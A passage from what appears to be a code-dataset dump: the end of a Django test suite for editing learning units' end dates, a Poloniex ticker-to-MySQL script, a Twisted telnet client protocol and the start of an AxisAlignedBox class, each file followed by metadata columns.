edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
self.assertEqual(str(context.exception),
_('The learning unit %(learning_unit)s has a partim %(partim)s with'
' an end year greater than %(year)s') % {
'learning_unit': learning_unit_full_annual.acronym,
'partim': list_partims[1].acronym,
'year': academic_year_of_new_end_date}
)
def test_edit_learning_unit_full_end_year_max_value_with_partim_end_year_none(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year - 1)
max_end_year = AcademicYearFactory(year=compute_max_academic_year_adjournment())
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=None)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=None)
list_partims = self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now[:2],
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
learning_unit_full_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_full_annual.save()
learning_unit_partim_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_partim_annual.save()
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(max_end_year.year)
with self.assertRaises(IntegrityError) as context:
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
self.assertEqual(str(context.exception),
_('The learning unit %(learning_unit)s has a partim %(partim)s '
'with an end year greater than %(year)s') % {
'learning_unit': learning_unit_full_annual.acronym,
'partim': list_partims[1].acronym,
'year': academic_year_of_new_end_date}
)
def test_edit_learning_unit_full_end_year_max_value_with_partim_end_year(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year)
max_end_year = AcademicYearFactory(year=compute_max_academic_year_adjournment())
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=None)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=None)
list_partims = self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
learning_unit_full_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_full_annual.save()
learning_unit_partim_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_partim_annual.save()
self._edit_lu(learning_unit_partim_annual, max_end_year.year)
self._edit_lu(learning_unit_full_annual, max_end_year.year)
def test_edit_learning_unit_full_end_year_none_value_with_partim_end_year(self):
start_year = AcademicYearFactory(year=self.starting_academic_year.year)
max_end_year = AcademicYearFactory(year=compute_max_academic_year_adjournment())
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year, end_year=max_end_year)
learning_unit_partim_annual = self.setup_learning_unit(start_year=start_year, end_year=max_end_year)
list_partims = self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now,
learning_unit_full=learning_unit_full_annual,
learning_unit_partim=learning_unit_partim_annual
)
learning_unit_full_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_full_annual.save()
learning_unit_partim_annual.learning_container = list_partims[0].learning_container_year.learning_container
learning_unit_partim_annual.save()
with self.assertRaises(IntegrityError) as context:
edit_learning_unit_end_date(learning_unit_partim_annual, None)
self.assertEqual(str(context.exception),
_('The selected end year (%(partim_end_year)s) is greater '
'than the end year of the parent %(lu_parent)s') % {
'partim_end_year': NO_PLANNED_END_DISPLAY,
'lu_parent': learning_unit_full_annual.acronym
})
def test_shorten_and_extend_learning_unit_partim_end_year_to_none(self):
start_year_full = AcademicYearFactory(year=self.starting_academic_year.year)
end_year_full = AcademicYearFactory(year=compute_max_academic_year_adjournment())
generator_learning_container = GenerateContainer(start_year=start_year_full, end_year=end_year_full)
generator_learning_container.learning_unit_partim.end_year = None
generator_learning_container.learning_unit_partim.save()
excepted_end_year = start_year_full.year + 2
self._edit_lu(generator_learning_container.learning_unit_partim, excepted_end_year)
excepted_end_year += 2
self._edit_lu(generator_learning_container.learning_unit_partim, excepted_end_year)
with self.assertRaises(IntegrityError):
self._edit_lu(generator_learning_container.learning_unit_partim, None)
def test_edition_learning_extend_with_related_tables(self):
start_year_full = AcademicYearFactory(year=self.starting_academic_year.year)
end_year_full = AcademicYearFactory(year=start_year_full.year + 6)
generator_learning_container = GenerateContainer(start_year=start_year_full, end_year=end_year_full)
excepted_end_year = end_year_full.year + 2
self._edit_lu(generator_learning_container.learning_unit_full, excepted_end_year)
last_generated_luy = LearningUnitYear.objects.filter(
learning_unit=generator_learning_container.learning_unit_full
).order_by('academic_year').last()
last_container = last_generated_luy.learning_container_year
self._assert_entity_container_year_correctly_duplicated(generator_learning_container.entities, last_container)
last_generated_component = LearningComponentYear.objects.filter(learning_unit_year=last_generated_luy).last()
self.assertEqual(
last_generated_luy.learning_container_year,
last_generated_component.learning_unit_year.learning_container_year
)
self._assert_learning_classes_correctly_duplicated(
last_generated_component,
generator_learning_container.generated_container_years[0].nb_classes
)
def _assert_learning_classes_correctly_duplicated(self, component, expected_nb_classes):
self.assertEqual(LearningClassYear.objects.filter(learning_component_year=component).count(),
expected_nb_classes)
def _assert_entity_container_year_correctly_duplicated(self, expected_entities, duplicated_container):
diff = set(expected_entities) - set(duplicated_container.get_map_entity_by_type().values())
self.assertEqual(diff, set())
def _create_full_learning_unit(self):
start_year_full = AcademicYearFactory(year=self.starting_academic_year.year)
end_year_full = AcademicYearFactory(year=start_year_full.year + 6)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year_full, end_year=end_year_full)
learning_unit_years = self.setup_list_of_learning_unit_years_full(
self.list_of_academic_years_after_now,
learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.ANNUAL
)
_create_learning_component_years(learning_unit_years, self.number_classes)
return end_year_full, learning_unit_full_annual, learning_unit_years
def test_shorten_and_extend_learning_unit(self):
end_year_full, learning_unit_full_annual, _ = self._create_full_learning_unit()
# shorten & extend lu
excepted_end_year = end_year_full.year - 2
self._edit_lu(learning_unit_full_annual, excepted_end_year)
excepted_end_year += 2
self._edit_lu(learning_unit_full_annual, excepted_end_year)
excepted_end_year -= 2
self._edit_lu(learning_unit_full_annual, excepted_end_year)
excepted_end_year += 3
self._edit_lu(learning_unit_full_annual, excepted_end_year)
excepted_end_year -= 4
self._edit_lu(learning_unit_full_annual, excepted_end_year)
def test_extend_learning_unit_with_wrong_entity(self):
end_year_full, learning_unit_full_annual, learning_unit_years = self._create_full_learning_unit()
# Add outdated entityversion for requirement entity
outdated_entity_version = EntityVersionFactory(end_date=self.starting_academic_year.end_date)
LearningContainerYear.objects.filter(
id__in=[luy.learning_container_year_id for luy in learning_unit_years]
).update(requirement_entity=outdated_entity_version.entity)
excepted_end_year = AcademicYearFactory(year=end_year_full.year + 3)
with self.assertRaises(IntegrityError) as e:
self._edit_lu(learning_unit_full_annual, excepted_end_year.year)
self.assertEqual(
str(e.exception),
_(
'The entity %(entity_acronym)s does not exist for '
'the selected academic year %(academic_year)s') %
{
'entity_acronym': outdated_entity_version.acronym,
'academic_year': academic_year.find_academic_year_by_year(end_year_full.year + 1)
})
def test_with_partim_fields_that_are_not_reported(self):
start_academic_year = AcademicYearFactory(year=self.starting_academic_year.year)
lu_full = self.setup_learning_unit(start_year=start_academic_year,
end_year=self.list_of_academic_years_after_now[3])
lu_partim = self.setup_learning_unit(start_year=start_academic_year,
end_year=start_academic_year)
lu_year_partims = self.setup_list_of_learning_unit_years_partim(
list_of_academic_years=self.list_of_academic_years_after_now[:4],
learning_unit_full=lu_full,
learning_unit_partim=lu_partim
)
for partim in lu_year_partims[2:]:
partim.delete()
lu_year_partims[1].attribution_procedure = attribution_procedure.INTERNAL_TEAM
lu_year_partims[1].save()
lu_year_partims[1].learning_container_year.is_vacant = True
lu_year_partims[1].learning_container_year.team = True
lu_year_partims[1].learning_container_year.save()
edit_learning_unit_end_date(lu_partim, self.list_of_academic_years_after_now[3])
created_partims = list(
LearningUnitYear.objects.filter(
subtype=learning_unit_year_subtypes.PARTIM
).exclude(id=lu_year_partims[1].id)
)
self.assertEqual(len(created_partims), 3)
for partim in created_partims:
self.assertIsNone(partim.attribution_procedure)
self.assertFalse(partim.learning_container_year.is_vacant)
self.assertTrue(partim.learning_container_year.team)
def _edit_lu(self, learning_unit_annual, excepted_end_year):
end_year = learning_unit_annual.end_year.year if learning_unit_annual.end_year else \
compute_max_academic_year_adjournment()
if not excepted_end_year:
new_end_year = compute_max_academic_year_adjournment()
else:
new_end_year = excepted_end_year
excepted_nb_msg = abs(end_year - new_end_year) + 1
list_of_expected_years = list(range(learning_unit_annual.start_year.year, new_end_year + 1))
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(excepted_end_year)
result = edit_learning_unit_end_date(learning_unit_annual, academic_year_of_new_end_date)
self.assertTrue(len(result) >= excepted_nb_msg)
list_of_years_learning_unit = _get_list_years_learning_unit(learning_unit_annual)
self.assertEqual(list_of_years_learning_unit, list_of_expected_years)
self.assertEqual(learning_unit_annual.end_year.year, excepted_end_year)
def test_postpone_end_date_with_cms_data_and_teaching_material(self):
start_year_full = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year_full = AcademicYearFactory(year=self.starting_academic_year.year + 1)
expected_end_year_full = AcademicYearFactory(year=end_year_full.year + 2)
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(expected_end_year_full.year)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year_full, end_year=end_year_full)
luy_list = self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.ANNUAL
)
self.setup_educational_information(luy_list)
last_luy = mdl_luy.find_latest_by_learning_unit(learning_unit_full_annual)
last_luy_teaching_material_count = mdl_teaching_material.find_by_learning_unit_year(last_luy).count()
last_luy_educational_information = build_list_of_cms_content_by_reference(last_luy.id)
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
new_luy = mdl_luy.find_latest_by_learning_unit(learning_unit_full_annual)
new_luy_teaching_material_count = mdl_teaching_material.find_by_learning_unit_year(new_luy).count()
new_luy_educational_information = build_list_of_cms_content_by_reference(new_luy.id)
self.assertEqual(last_luy_teaching_material_count, new_luy_teaching_material_count)
self.assertCountEqual(last_luy_educational_information, new_luy_educational_information)
def test_postpone_end_date_with_external_learning_unit(self):
start_year_full = AcademicYearFactory(year=self.starting_academic_year.year - 1)
end_year_full = AcademicYearFactory(year=self.starting_academic_year.year + 1)
expected_end_year_full = AcademicYearFactory(year=end_year_full.year + 2)
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(expected_end_year_full.year)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year_full, end_year=end_year_full)
luy_list = self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.ANNUAL
)
for luy in luy_list:
ExternalLearningUnitYearFactory(learning_unit_year=luy, external_acronym="Yolo")
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
new_luy = mdl_luy.find_latest_by_learning_unit(learning_unit_full_annual)
self.assertEqual(new_luy.externallearningunityear.external_acronym, "Yolo")
def test_shorten_end_date_with_external_learning_unit(self):
start_year_full = AcademicYearFactory(year=self.starting_academic_year.year - 3)
end_year_full = AcademicYearFactory(year=self.starting_academic_year.year)
expected_end_year_full = AcademicYearFactory(year=end_year_full.year - 2)
academic_year_of_new_end_date = academic_year.find_academic_year_by_year(expected_end_year_full.year)
learning_unit_full_annual = self.setup_learning_unit(start_year=start_year_full, end_year=end_year_full)
luy_list = self.setup_list_of_learning_unit_years_full(
list_of_academic_years=self.list_of_academic_years,
learning_unit_full=learning_unit_full_annual,
periodicity=learning_unit_year_periodicity.ANNUAL
)
for luy in luy_list:
ExternalLearningUnitYearFactory(learning_unit_year=luy, external_acronym="Yolo")
edit_learning_unit_end_date(learning_unit_full_annual, academic_year_of_new_end_date)
new_luy = mdl_luy.find_latest_by_learning_unit(learning_unit_full_annual)
self.assertEqual(learning_unit_full_annual.end_year.year, academic_year_of_new_end_date.year)
self.assertEqual(new_luy.externallearningunityear.external_acronym, "Yolo")
def _create_classes(learning_component_year, number_classes):
for _ in range(number_classes):
LearningClassYearFactory(learning_component_year=learning_component_year)
def _create_learning_component_years(learning_unit_years, number_classes=None):
for luy in learning_unit_years:
component = LearningComponentYearFactory(learning_unit_year=luy)
if number_classes:
_create_classes(component, number_classes)
def _get_list_years_learning_unit(learning_unit):
return list(
LearningUnitYear.objects.filter(learning_unit=learning_unit
).values_list('academic_year__year', flat=True).order_by('academic_year')
)
def build_list_of_cms_content_by_reference(reference):
return [
(translated_text.language, translated_text.text_label, translated_text.entity, translated_text.text)
for translated_text in TranslatedText.objects.filter(reference=reference)
]
class TestModifyLearningUnit(TestCase, LearningUnitsMixin):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.setup_academic_years()
cls.other_language = LanguageFactory()
cls.other_campus = CampusFactory()
cls.faculty_remark = "Faculty remark"
cls.my_course = "My course"
def setUp(self):
self.learning_container_year = LearningContainerYearFactory(academic_year=self.starting_academic_year)
self.learning_unit_year = LearningUnitYearFactory(learning_container_year=self.learning_container_year,
subtype=learning_unit_year_subtypes.FULL)
def test_with_no_fields_to_update(self):
old_luy_values = model_to_dict(self.learning_unit_year, exclude="learning_component_years")
old_lc_values = model_to_dict(self.learning_container_year)
update_learning_unit_year_with_report(self.learning_unit_year, {}, {})
self.learning_unit_year.refresh_from_db()
self.learning_container_year.refresh_from_db()
new_luy_values = model_to_dict(self.learning_unit_year, exclude="learning_component_years")
new_lc_values = model_to_dict(self.learning_container_year)
self.maxDiff = None
self.assertDictEqual(old_luy_values, new_luy_values)
self.assertDictEqual(old_lc_values, new_lc_values)
def test_with_learning_unit_fields_to_update(self):
fields_to_update = {
"faculty_remark": self.faculty_remark,
"other_remark": "Other remark"
}
update_learning_unit_year_with_report(self.learning_unit_year, fields_to_update, {})
self.assert_fields_updated(self.learning_unit_year.learning_unit, fields_to_update)
def test_with_learning_unit_year_fields_to_update(self):
fields_to_update = {
"specific_title": "Mon cours",
"specific_title_english": self.my_course,
"credits": Decimal('45.00'),
"internship_subtype": internship_subtypes.PROFESSIONAL_INTERNSHIP,
"status": False,
"session": learning_unit_year_session.SESSION_123,
"quadrimester": quadrimesters.LearningUnitYearQuadrimester.Q2.name,
"attribution_procedure": attribution_procedure.EXTERNAL,
"language": self.other_language
}
update_learning_unit_year_with_report(self.learning_unit_year, fields_to_update, {})
fields_to_update["language"] = fields_to_update["language"].pk
self.assert_fields_updated(self.learning_unit_year, fields_to_update)
def test_with_learning_container_year_fields_to_update(self):
fields_to_update = {
"common_title": "Mon common",
"common_title_english": "My common",
"team": True,
"is_vacant": True,
"type_declaration_vacant": vacant_declaration_type.VACANT_NOT_PUBLISH
}
update_learning_unit_year_with_report(self.learning_unit_year, fields_to_update, {})
self.learning_container_year.refresh_from_db()
new_lcy_values = model_to_dict(self.learning_container_year, fields=fields_to_update.keys())
expected_model_dict_values = fields_to_update
self.assertDictEqual(expected_model_dict_values, new_lcy_values)
def test_apply_updates_on_next_learning_unit_years(self):
a_learning_unit = self.setup_learning_unit(self.starting_academic_year)
learning_unit_years = self.setup_list_of_learning_unit_years_full(self.list_of_academic_years_after_now,
a_learning_unit,
learning_unit_year_periodicity.ANNUAL)
learning_unit_fields_to_update = {
"faculty_remark": self.faculty_remark
}
learning_unit_year_fields_to_update = {
"specific_title_english": self.my_course,
"credits": 45,
"attribution_procedure": attribution_procedure.EXTERNAL
}
learning_container_year_fields_to_update = {
"team": True,
"is_vacant": True,
"type_declaration_vacant": vacant_declaration_type.VACANT_NOT_PUBLISH
}
fields_to_update = dict()
fields_to_update.update(learning_unit_fields_to_update)
fields_to_update.update(learning_unit_year_fields_to_update)
fields_to_update.update(learning_container_year_fields_to_update)
update_learning_unit_year_with_report(learning_unit_years[1], fields_to_update, {},
override_postponement_consistency=True)
self.assert_fields_not_updated(learning_unit_years[0], exclude="learning_component_years")
self.assert_fields_not_updated(learning_unit_years[0].learning_container_year)
for index, luy in enumerate(learning_unit_years[1:]):
self.assert_fields_updated(luy.learning_unit, learning_unit_fields_to_update)
if index == 0:
self.assert_fields_updated(luy, learning_unit_year_fields_to_update)
self.assert_fields_updated(luy.learning_container_year, learning_container_year_fields_to_update)
else:
self.assert_fields_updated(luy.learning_container_year, learning_container_year_fields_to_update,
exclude=["is_vacant", "type_declaration_vacant", 'team'])
self.assert_fields_not_updated(luy.learning_container_year, fields=["team"])
self.assert_fields_updated(luy, learning_unit_year_fields_to_update, exclude=["attribution_procedure"])
self.assert_fields_not_updated(luy, fields=["attribution_procedure"])
def test_when_not_reporting(self):
a_learning_unit = self.setup_learning_unit(self.starting_academic_year)
learning_unit_years = self.setup_list_of_learning_unit_years_full(
self.list_of_academic_years_after_now,
a_learning_unit,
periodicity=learning_unit_year_periodicity.ANNUAL
)
learning_unit_fields_to_update = {
"faculty_remark": self.faculty_remark
}
learning_unit_year_fields_to_update = {
"specific_title_english": self.my_course,
"credits": 45,
"attribution_procedure": attribution_procedure.EXTERNAL
}
learning_container_year_fields_to_update = {
"team": True,
"is_vacant": True,
"type_declaration_vacant": vacant_declaration_type.VACANT_NOT_PUBLISH
}
fields_to_update = dict()
fields_to_update.update(learning_unit_fields_to_update)
fields_to_update.update(learning_unit_year_fields_to_update)
fields_to_update.update(learning_container_year_fields_to_update)
update_learning_unit_year_with_report(learning_unit_years[0], fields_to_update, {}, with_report=False)
self.assert_fields_updated(learning_unit_years[0].learning_unit, learning_unit_fields_to_update)
self.assert_fields_updated(learning_unit_years[0], learning_unit_year_fields_to_update)
self.assert_fields_updated(learning_unit_years[0].learning_container_year,
learning_container_year_fields_to_update)
for luy in learning_unit_years[1:]:
self.assert_fields_not_updated(luy, exclude="learning_component_years")
self.assert_fields_not_updated(luy.learning_container_year)
def assert_fields_updated(self, instance, fields_value, exclude=None):
if exclude is None:
exclude = []
instance.refresh_from_db()
instance_values = model_to_dict(instance, fields=fields_value.keys(), exclude=exclude)
fields_value_without_excluded = {field: value for field, value in fields_value.items() if field not in exclude}
self.assertDictEqual(fields_value_without_excluded, instance_values)
def assert_fields_not_updated(self, instance, fields=None, exclude=None):
past_instance_values = model_to_dict(instance, fields, exclude)
instance.refresh_from_db()
new_instance_values = model_to_dict(instance, fields, exclude)
self.maxDiff = None
self.assertDictEqual(past_instance_values, new_instance_values)
class TestUpdateLearningUnitEntities(TestCase, LearningUnitsMixin):
@classmethod
def setUpTestData(cls):
cls.setup_academic_years()
def setUp(self):
self.learning_container_year = LearningContainerYearFactory(
academic_year=self.starting_academic_year,
container_type=learning_container_year_types.COURSE,
type_declaration_vacant=vacant_declaration_type.DO_NOT_ASSIGN,
requirement_entity=EntityFactory(),
allocation_entity=EntityFactory(),
additional_entity_1=EntityFactory(),
additional_entity_2=EntityFactory(),
)
self.learning_unit_year = LearningUnitYearFactory(
learning_container_year=self.learning_container_year,
academic_year=self.starting_academic_year,
subtype=learning_unit_year_subtypes.FULL,
attribution_procedure=attribution_procedure.INTERNAL_TEAM)
self.learning_component_year = LearningComponentYearFactory(
learning_unit_year=self.learning_unit_year,
acronym="PM",
type=learning_component_year_type.LECTURING)
def test_with_no_entities_to_update(self):
update_learning_unit_year_with_report(self.learning_unit_year, {}, {})
self.assert_entity_has_not_changed(self.learning_container_year, REQUIREMENT_ENTITY)
self.assert_entity_has_not_changed(self.learning_container_year, ALLOCATION_ENTITY)
self.assert_entity_has_not_changed(self.learning_container_year, ADDITIONAL_REQUIREMENT_ENTITY_1)
self.assert_entity_has_not_changed(self.learning_container_year, ADDITIONAL_REQUIREMENT_ENTITY_2)
def test_with_one_entity_to_update(self):
a_new_requirement_entity = EntityFactory()
entities_to_update = {entity_container_year_link_type.REQUIREMENT_ENTITY: a_new_requirement_entity}
update_learning_unit_year_with_report(self.learning_unit_year, {}, entities_to_update)
self.assert_entity_has_not_changed(self.learning_container_year, ALLOCATION_ENTITY)
self.assert_entity_has_not_changed(self.learning_container_year, ADDITIONAL_REQUIREMENT_ENTITY_1)
self.assert_entity_has_not_changed(self.learning_container_year, ADDITIONAL_REQUIREMENT_ENTITY_2)
self.assert_entity_has_been_modified(self.learning_container_year, a_new_requirement_entity, REQUIREMENT_ENTITY)
def test_with_all_entities_to_update(self):
a_new_requirement_entity = EntityFactory()
a_new_allocation_entity = EntityFactory()
a_new_additional_entity_1 = EntityFactory()
a_new_additional_entity_2 = EntityFactory()
entities_to_update = {
entity_container_year_link_type.REQUIREMENT_ENTITY: a_new_requirement_entity,
entity_container_year_link_type.ALLOCATION_ENTITY: a_new_allocation_entity,
entity_container_year_link_type.ADDITIONAL_REQUIREMENT_ENTITY_1: a_new_additional_entity_1,
entity_container_year_link_type.ADDITIONAL_REQUIREMENT_ENTITY_2: a_new_additional_entity_2
}
update_learning_unit_year_with_report(self.learning_unit_year, {}, entities_to_update)
self.assert_entity_has_been_modified(self.learning_container_year, a_new_requirement_entity, REQUIREMENT_ENTITY)
self.assert_entity_has_been_modified(self.learning_container_year, a_new_allocation_entity, ALLOCATION_ENTITY)
self.assert_entity_has_been_modified(self.learning_container_year, a_new_additional_entity_1,
ADDITIONAL_REQUIREMENT_ENTITY_1)
self.assert_entity_has_been_modified(self.learning_container_year, a_new_additional_entity_2,
ADDITIONAL_REQUIREMENT_ENTITY_2)
def test_with_entity_set_to_none(self):
entities_to_update = {entity_container_year_link_type.ADDITIONAL_REQUIREMENT_ENTITY_2: None}
update_learning_unit_year_with_report(self.learning_unit_year, {}, entities_to_update)
self.assert_entity_has_not_changed(self.learning_container_year,
entity_container_year_link_type.REQUIREMENT_ENTITY)
self.assert_entity_has_not_changed(self.learning_container_year,
entity_container_year_link_type.ALLOCATION_ENTITY)
self.assert_entity_has_not_changed(self.learning_container_year,
entity_container_year_link_type.ADDITIONAL_REQUIREMENT_ENTITY_1)
self.learning_container_year.refresh_from_db()
self.assertIsNone(self.learning_container_year.additional_entity_2)
def test_with_entity_none_and_full_in(self):
self.learning_container_year.additional_entity_2 = None
self.learning_container_year.save()
a_new_additional_requirement_entity = EntityFactory()
entities_to_update = {
entity_container_year_link_type.ADDITIONAL_REQUIREMENT_ENTITY_2: a_new_additional_requirement_entity
}
update_learning_unit_year_with_report(self.learning_unit_year, {}, entities_to_update)
self.assertTrue(
LearningContainerYear.objects.filter(
pk=self.learning_container_year.id,
additional_entity_2=a_new_additional_requirement_entity,
).exists()
)
def test_apply_changes_to_next_learning_unit_year(self):
a_learning_unit = self.setup_learning_unit(self.starting_academic_year)
learning_unit_years = self.setup_list_of_learning_unit_years_full(
self.list_of_academic_years_after_now,
a_learning_unit,
periodicity=learning_unit_year_periodicity.ANNUAL
)
current_requirement_entity = EntityFactory()
for luy in learning_unit_years:
container_year = luy.learning_container_year
container_year.requirement_entity = current_requirement_entity
container_year.save()
a_new_requirement_entity = EntityFactory()
entities_to_update = {entity_container_year_link_type.REQUIREMENT_ENTITY: a_new_requirement_entity}
update_learning_unit_year_with_report(
learning_unit_years[1],
{},
entities_to_update,
override_postponement_consistency=True
)
self.assert_entity_has_not_changed(
learning_unit_years[0].learning_container_year,
entity_container_year_link_type.REQUIREMENT_ENTITY
)
for luy in learning_unit_years[1:]:
self.assert_entity_has_been_modified(
luy.learning_container_year,
a_new_requirement_entity,
REQUIREMENT_ENTITY
)
def test_with_no_report(self):
a_learning_unit = self.setup_learning_unit(self.starting_academic_year)
learning_unit_years = self.setup_list_of_learning_unit_years_full(
self.list_of_academic_years_after_now,
a_learning_unit,
periodicity=learning_unit_year_periodicity.ANNUAL
)
current_requirement_entity = EntityFactory()
for luy in learning_unit_years:
container_year = luy.learning_container_year
container_year.requirement_entity = current_requirement_entity
container_year.save()
a_new_requirement_entity = EntityFactory()
entities_to_update = {entity_container_year_link_type.REQUIREMENT_ENTITY: a_new_requirement_entity}
update_learning_unit_year_with_report(learning_unit_years[0], {}, entities_to_update, with_report=False)
self.assert_entity_has_been_modified(
learning_unit_years[0].learning_container_year,
a_new_requirement_entity,
REQUIREMENT_ENTITY
)
for luy in learning_unit_years[1:]:
self.assert_entity_has_not_changed(
luy.learning_container_year,
entity_container_year_link_type.REQUIREMENT_ENTITY
)
def assert_entity_has_not_changed(self, learning_container_year, entity_link_type):
past_entity = learning_container_year.get_entity_from_type(entity_link_type)
learning_container_year.refresh_from_db()
current_entity = learning_container_year.get_entity_from_type(entity_link_type)
self.assertEqual(past_entity, current_entity)
def assert_entity_has_been_modified(self, learning_container_year, expected_entity, entity_link_type):
learning_container_year.refresh_from_db()
self.assertEqual(learning_container_year.get_entity_from_type(entity_link_type), expected_entity)
class TestReportVolumes(TestCase):
@classmethod
def setUpTestData(cls):
cls.learning_unit = LearningUnitFactory()
cls.academic_years = AcademicYearFactory.produce_in_future(quantity=3)
cls.learning_unit_years = [LearningUnitYearFactory(academic_year=acy) for acy in cls.academic_years]
def setUp(self) -> None:
self.lecturing_component_years = [
LecturingLearningComponentYearFactory(learning_unit_year=luy) for luy in self.learning_unit_years
]
self.practical_component_years = [
PracticalLearningComponentYearFactory(learning_unit_year=luy) for luy in self.learning_unit_years
]
def test_should_report_values_from_reference_learning_unit_year_to_others(self):
reference, *others = self.learning_unit_years
reference_lecturing_component = self.lecturing_component_years[0]
reference_lecturing_component.hourly_volume_partial_q1 = 20
reference_lecturing_component.hourly_volume_partial_q2 = 35
reference_lecturing_component.hourly_volume_total_annual = 55
reference_lecturing_component.save()
reference_practical_component = self.practical_component_years[0]
reference_practical_component.hourly_volume_partial_q1 = 18
reference_practical_component.hourly_volume_partial_q2 = 2
reference_practical_component.hourly_volume_total_annual = 20
reference_practical_component.save()
_report_volume(reference, others)
for lecturing_component in self.lecturing_component_years[1:]:
lecturing_component.refresh_from_db()
self.assert_component_volumes_equal(reference_lecturing_component, lecturing_component)
for practical_component in self.practical_component_years[1:]:
practical_component.refresh_from_db()
self.assert_component_volumes_equal(reference_practical_component, practical_component)
def assert_component_volumes_equal(self, first_component, second_component):
pertinent_fields = [
"planned_classes",
"hourly_volume_total_annual",
"hourly_volume_partial_q1",
"hourly_volume_partial_q2",
"repartition_volume_requirement_entity",
"repartition_volume_additional_entity_1",
"repartition_volume_additional_entity_2",
]
self.assertDictEqual(
model_to_dict(first_component, fields=pertinent_fields),
model_to_dict(second_component, fields=pertinent_fields)
)
| agpl-3.0 | -4,031,647,468,622,149,600 | 52.628183 | 120 | 0.684601 | false |
ffee21/jpdanta | sandbox/sandbox3.py | 1 | 1769 | import datetime
import requests
import pymysql.cursors
def getconn():
PASSPHRASE_FILE = './sandbox/.passphrase'
PASSPHRASE = ''
with open(PASSPHRASE_FILE) as f:
PASSPHRASE = f.read()
connection = pymysql.connect(host='localhost',user='user',password=PASSPHRASE,db='jpdanta')
return connection
def getticker():
PUBLIC_TICKER_URL = "https://poloniex.com/public?command=returnTicker"
r = requests.get(PUBLIC_TICKER_URL)
ticker = r.json()
return ticker
def getvaluelist(ticker):
btc_based_coins = list(filter(lambda x: x.startswith("BTC_"), list(ticker.keys())))
MZR_LIST = ['last', 'lowestAsk', 'highestBid', 'percentChange', 'baseVolume', 'quoteVolume', 'high24hr', 'low24hr']
return_list = []
for coin in btc_based_coins:
for mzr in MZR_LIST:
return_list.append([coin, mzr, ticker[coin][mzr]])
return return_list
def insertticker(conn, value_list, timestamp):
with conn.cursor() as cursor:
sql = "INSERT INTO `ticker` (`mzrtime`, `coin`, `mzr`, `value`) VALUES (%s, %s, %s, %s)"
for item in value_list:
cursor.execute(sql, (timestamp, item[0], item[1], item[2]))
conn.commit()
def log(conn, message, level=0):
with conn.cursor() as cursor:
sql = "INSERT INTO `log` (`level`, `body`) VALUES (%s, %s)"
cursor.execute(sql, (level, message))
conn.commit()
print(str(datetime.datetime.now()) + ": [" + str(level) + "] " + message)
conn = getconn()
log(conn, "Fetching the ticker", 0)
timestamp = datetime.datetime.now()
ticker_now = getticker()
log(conn, "Inserting into DB", 0)
value_list = getvaluelist(ticker_now)
insertticker(conn, value_list, timestamp)
log(conn, "Finishing ticker insert", 0)
conn.close() | apache-2.0 | 6,508,561,294,485,118,000 | 30.607143 | 119 | 0.645562 | false |
chrisnorman7/mmc2 | connection.py | 1 | 1423 | """MMC2 connection objects."""
from twisted.protocols.basic import LineReceiver
from twisted.conch.telnet import TelnetProtocol
from twisted.internet.protocol import ClientFactory
import logging, command_parser, application
logger = logging.getLogger('Connection')
class MyClientFactory(ClientFactory):
def __init__(self):
self.protocol = Protocol(self)
self.transport = None
def buildProtocol(self, addr):
return self.protocol
class Protocol(TelnetProtocol):
def __init__(self, factory):
self.factory = factory
def connectionMade(self):
logger.info('Connected.')
self.factory.transport = self.transport
application.frame.SetTitle()
def connectionLost(self, reason):
logger.info('Connection lost: %s.', reason.getErrorMessage())
application.host = None
application.port = None
application.frame.SetTitle()
def dataReceived(self, data):
for line in data.split('\r\n'):
application.lines += 1
application.frame.SetStatusText('Lines received: %s.' % application.lines)
command_parser.handle_incoming(line)
def disableLocal(self, option):
logger.debug('Disable local: %s.', option)
def enableLocal(self, option):
logger.debug('Enable local: %s.', option)
def disableRemote(self, option):
logger.debug('Disable remote: %s.', option)
def enableRemote(self, option):
logger.debug('Enable remote: %s.', option)
| mpl-2.0 | 2,702,768,374,433,925,600 | 27.040816 | 77 | 0.711876 | false |
CG-F16-7-Rutgers/steersuite-rutgers | steerstats/steersuite/AxisAlignedBox.py | 8 | 1603 |
class AxisAlignedBox(object):
def __init__(self, xmin, xmax, ymin, ymax, zmin, zmax):
self._xmin=xmin
self._xmax=xmax
self._ymin=ymin
self._ymax=ymax
self._zmin=zmin
self._zmax=zmax
def get_xmin(self):
return self._xmin
def get_xmax(self):
return self._xmax
